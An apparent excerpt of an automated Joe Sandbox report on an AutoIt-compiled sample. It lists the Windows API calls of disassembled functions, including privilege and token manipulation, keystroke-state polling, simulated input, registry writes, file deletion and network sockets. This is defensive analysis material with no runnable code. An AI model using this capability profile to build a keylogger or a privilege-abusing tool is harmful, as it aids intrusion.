                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                        • String ID: Shell_TrayWnd
                                                                                        • API String ID: 4125248594-2988720461
                                                                                        APIs
                                                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                        • _memset.LIBCMT ref: 00458353
                                                                                        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
                                                                                        • CloseHandle.KERNEL32(?), ref: 004583B6
                                                                                        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
                                                                                        • GetProcessWindowStation.USER32 ref: 004583E6
                                                                                        • SetProcessWindowStation.USER32(00000000), ref: 004583F0
                                                                                        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A
                                                                                          • Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                          • Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                        • String ID: $default$winsta0
                                                                                        • API String ID: 2063423040-1027155976
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046C7E1
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
                                                                                        • __swprintf.LIBCMT ref: 0046C890
                                                                                        • __swprintf.LIBCMT ref: 0046C8D3
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • __swprintf.LIBCMT ref: 0046C927
                                                                                          • Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1
                                                                                        • __swprintf.LIBCMT ref: 0046C975
                                                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
                                                                                          • Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B
                                                                                        • __swprintf.LIBCMT ref: 0046C9C4
                                                                                        • __swprintf.LIBCMT ref: 0046CA13
                                                                                        • __swprintf.LIBCMT ref: 0046CA62
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                        • API String ID: 3953360268-2428617273
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046EFB6
                                                                                        • _wcscmp.LIBCMT ref: 0046EFCB
                                                                                        • _wcscmp.LIBCMT ref: 0046EFE2
                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F031
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
                                                                                        • _wcscmp.LIBCMT ref: 0046F074
                                                                                        • _wcscmp.LIBCMT ref: 0046F08B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
                                                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F0D2
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F0E4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1803514871-438819550
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00480DB2
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00480DBF
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
                                                                                        • API String ID: 0-559809668
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0046F113
                                                                                        • _wcscmp.LIBCMT ref: 0046F128
                                                                                        • _wcscmp.LIBCMT ref: 0046F13F
                                                                                          • Part of subcall function 00464385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004643A0
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0046F16E
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F179
                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0046F195
                                                                                        • _wcscmp.LIBCMT ref: 0046F1BC
                                                                                        • _wcscmp.LIBCMT ref: 0046F1D3
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0046F1E5
                                                                                        • SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F203
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F20D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F21A
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F22C
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                        • String ID: *.*
                                                                                        • API String ID: 1824444939-438819550
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
                                                                                        • __swprintf.LIBCMT ref: 0046A231
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
                                                                                        • _memset.LIBCMT ref: 0046A2B2
                                                                                        • _wcsncpy.LIBCMT ref: 0046A2EE
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A32E
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 0046A337
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0046A341
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00460097
                                                                                        • SetKeyboardState.USER32(?), ref: 00460102
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00460122
                                                                                        • GetKeyState.USER32(000000A0), ref: 00460139
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00460168
                                                                                        • GetKeyState.USER32(000000A1), ref: 00460179
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 004601A5
                                                                                        • GetKeyState.USER32(00000011), ref: 004601B3
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 004601DC
                                                                                        • GetKeyState.USER32(00000012), ref: 004601EA
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00460213
                                                                                        • GetKeyState.USER32(0000005B), ref: 00460221
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        APIs
                                                                                          • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0048082F
                                                                                        Similarity
                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 1240663315-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                        • String ID:
                                                                                        • API String ID: 1737998785-0
                                                                                        APIs
                                                                                          • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                                                                                          • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004638A3
                                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0046394B
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0046395E
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0046397B
                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0046399D
                                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004639B9
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 4002782344-1173974218
                                                                                        APIs
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0046F440
                                                                                        • Sleep.KERNEL32(0000000A), ref: 0046F470
                                                                                        • _wcscmp.LIBCMT ref: 0046F484
                                                                                        • _wcscmp.LIBCMT ref: 0046F49F
                                                                                        • FindNextFileW.KERNEL32(?,?), ref: 0046F53D
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046F553
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                        • String ID: *.*
                                                                                        • API String ID: 713712311-438819550
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __itow__swprintf
                                                                                        • String ID: 3cA$_A
                                                                                        • API String ID: 674341424-3480954128
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        APIs
                                                                                          • Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                          • Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                          • Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 004651F9
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004762EB
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476307
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00476316
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476330
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476344
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        APIs
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                        • _memmove.LIBCMT ref: 00450258
                                                                                        • _memmove.LIBCMT ref: 0045036D
                                                                                        • _memmove.LIBCMT ref: 00450414
                                                                                        Similarity
                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1300846289-0
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                        • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                          • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                        Similarity
                                                                                        • API ID: ColorProc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3744519093-0
                                                                                        APIs
                                                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00476821
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 99427753-0
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                        • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2683427295-24824748
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                        • API String ID: 2574300362-192647395
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                          • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2576544623-0
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen
                                                                                        • String ID: ($|
                                                                                        • API String ID: 1659193697-1631851259
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                        • String ID:
                                                                                        • API String ID: 1682464887-0
                                                                                        APIs
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                        • GetLastError.KERNEL32 ref: 00458865
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                        • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        APIs
                                                                                        • __time64.LIBCMT ref: 0046889B
                                                                                          • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                                                          • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                                        • String ID: 0eL
                                                                                        • API String ID: 2893107130-3167399643
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                                                        • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                                                        • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        APIs
                                                                                        • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                        Similarity
                                                                                        • API ID: mouse_event
                                                                                        • String ID:
                                                                                        • API String ID: 2434400541-0
                                                                                        APIs
                                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                        Similarity
                                                                                        • API ID: LogonUser
                                                                                        • String ID:
                                                                                        • API String ID: 1244722697-0
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
                                                                                        • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                        • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                                                        • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                                                        • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 0047785B
                                                                                        • DeleteObject.GDI32(00000000), ref: 0047786D
                                                                                        • DestroyWindow.USER32 ref: 0047787B
                                                                                        • GetDesktopWindow.USER32 ref: 00477895
                                                                                        • GetWindowRect.USER32(00000000), ref: 0047789C
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004779DD
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004779ED
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A35
                                                                                        • GetClientRect.USER32(00000000,?), ref: 00477A41
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477A7B
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477A9D
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AB0
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477ABB
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00477AC4
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477AD3
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00477ADC
